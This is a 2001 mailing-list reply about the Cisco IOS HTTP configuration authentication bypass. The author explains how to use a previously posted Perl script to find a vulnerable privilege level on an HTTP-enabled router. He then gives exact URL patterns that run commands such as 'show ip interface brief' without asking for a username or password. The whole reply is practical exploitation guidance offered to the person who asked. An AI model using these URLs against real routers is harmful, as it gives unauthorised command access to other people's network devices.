Re[2]: Cisco IOS HTTP Configuration Exploit

From: Ertan Kurt (ertankat_private)
Date: Mon Jul 02 2001 - 02:37:26 PDT

    BT> Does it mean that when i enter the URL i will not be prompted to enter the username and password??

    Yes, just use the perl script (check previous mail) on a http server enabled cisco
    router and if it says smtg like:
    Vulnerable with {number}
    just use that number as shown below:
    http://routerIP/level/{number}/exec/-
    or send commands directly:
    http:///routerIP/level/{number}/exec/-/sh/ip/interface/brief/CR

    it will not ask you to provide a username and pass.

    Regards,

    Ertan Kurt

    ***cut***